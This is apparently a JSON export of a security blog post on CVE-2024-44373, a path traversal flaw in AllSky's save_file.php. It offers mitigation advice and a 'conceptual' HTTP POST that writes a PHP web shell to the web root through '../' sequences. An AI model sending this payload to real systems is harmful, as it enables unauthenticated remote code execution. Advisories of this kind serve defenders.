{"id":64327,"date":"2025-08-26T10:29:25","date_gmt":"2025-08-26T10:29:25","guid":{"rendered":""},"modified":"2025-09-26T14:04:56","modified_gmt":"2025-09-26T20:04:56","slug":"cve-2024-44373-exploiting-path-traversal-vulnerability-in-allsky-v2023-05-01-04","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2024-44373-exploiting-path-traversal-vulnerability-in-allsky-v2023-05-01-04\/","title":{"rendered":"<strong>CVE-2024-44373: Exploiting Path Traversal Vulnerability in AllSky v2023.05.01_04<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>A critical cybersecurity vulnerability has been discovered that affects AllSky version v2023.05.01_04. Identified as CVE-2024-44373, it presents a severe Path Traversal vulnerability that could potentially be exploited by unauthenticated attackers to compromise systems or leak sensitive data. The vulnerability, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31713-a-potential-privilege-escalation-vulnerability-due-to-command-injection\/\"  data-wpil-monitor-id=\"79475\">due to the nature of its potential<\/a> impact and the severity of the threat it poses, is a matter of high importance for organizations and individuals that use this version of AllSky.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2024-44373<br \/>\nSeverity: Critical (9.8 CVSS score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: None<br \/>\nImpact: Potential system compromise and <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-53495-unauthorized-access-data-leakage-in-wikimedia-foundation-mediawiki-abusefilter-extension\/\"  data-wpil-monitor-id=\"72619\">data leakage<\/a><\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-4051149298\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>AllSky | v2023.05.01_04<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The CVE-2024-44373 <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-54453-path-traversal-vulnerability-in-samsung-magicinfo-9-server\/\"  data-wpil-monitor-id=\"71858\">Path Traversal vulnerability<\/a> exists in the save_file.php file in the \/includes directory of AllSky. It allows an <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-25268-unauthenticated-adjacent-attacker-accessing-api-endpoint\/\"  data-wpil-monitor-id=\"77700\">unauthenticated attacker<\/a> to manipulate the path and content parameters to create a webshell. This webshell can subsequently be used for remote code execution, potentially granting the attacker full <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-41659-codesys-control-runtime-system-pki-folder-vulnerability\/\"  data-wpil-monitor-id=\"73927\">control over the targeted system<\/a>.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-1612782891\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>A conceptual example of how this vulnerability might be <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-24000-authentication-bypass-vulnerability-in-wpexperts-post-smtp-plugin\/\"  data-wpil-monitor-id=\"78977\">exploited<\/a> could look like a malicious HTTP POST request sent to the save_file.php endpoint. The attacker would manipulate the path and content parameters to create a webshell, as shown below:<\/p>\n<pre><code class=\"\" data-line=\"\">POST \/includes\/save_file.php HTTP\/1.1\nHost: target.example.com\nContent-Type: application\/json\n{\n&quot;path&quot;: &quot;..\/..\/..\/..\/var\/www\/html\/shell.php&quot;,\n&quot;content&quot;: &quot;&lt;?php echo shell_exec($_GET[&#039;cmd&#039;]); ?&gt;&quot;\n}<\/code><\/pre>\n<p>This example is highly simplified and conceptual. The actual exploitation process may vary based on the attacker&#8217;s tools, the specific <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2022-43110-critical-unauthenticated-remote-system-configuration-vulnerability-in-voltronic-power-viewpower-powershield-netguard\/\"  data-wpil-monitor-id=\"83140\">configuration of the targeted system<\/a>, and other factors.<\/p>\n<p><strong>Mitigation and Prevention<\/strong><\/p>\n<p>The best mitigation <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-46658-critical-security-vulnerability-in-exonautweb-s-4c-strategies-exonaut-21-6\/\"  data-wpil-monitor-id=\"82482\">strategy for this vulnerability<\/a> is to apply the vendor-provided patch as soon as it becomes available. If the patch is not available or cannot be applied immediately, temporary mitigation can be achieved by employing a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) to detect and block exploitation attempts.<br \/>\nIt is also recommended to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-6791-sql-injection-vulnerability-in-centreon-web-monitoring-event-logs-module\/\"  data-wpil-monitor-id=\"84099\">monitor system logs<\/a> for any unusual or suspicious activity, especially related to the \/includes\/save_file.php endpoint. Regularly updating and patching all software, as well as enforcing the principle of least privilege, can also help to limit the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-30327-integer-overflow-vulnerability-in-incopy-leading-to-potential-arbitrary-code-execution\/\"  data-wpil-monitor-id=\"73718\">potential impact of this and other vulnerabilities<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview A critical cybersecurity vulnerability has been discovered that affects AllSky version v2023.05.01_04. Identified as CVE-2024-44373, it presents a severe Path Traversal vulnerability that could potentially be exploited by unauthenticated attackers to compromise systems or leak sensitive data. The vulnerability, due to the nature of its potential impact and the severity of the threat it [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[85,80],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-64327","post","type-post","status-publish","format-standard","hentry","category-uncategorized","attack_vector-directory-traversal","attack_vector-rce"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64327","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=64327"}],"version-history":[{"count":10,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64327\/revisions"}],"predecessor-version":[{"id":76883,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64327\/revisions\/76883"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=64327"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=64327"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=64327"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=64327"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=64327"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=64327"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=64327"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=64327"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=64327"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}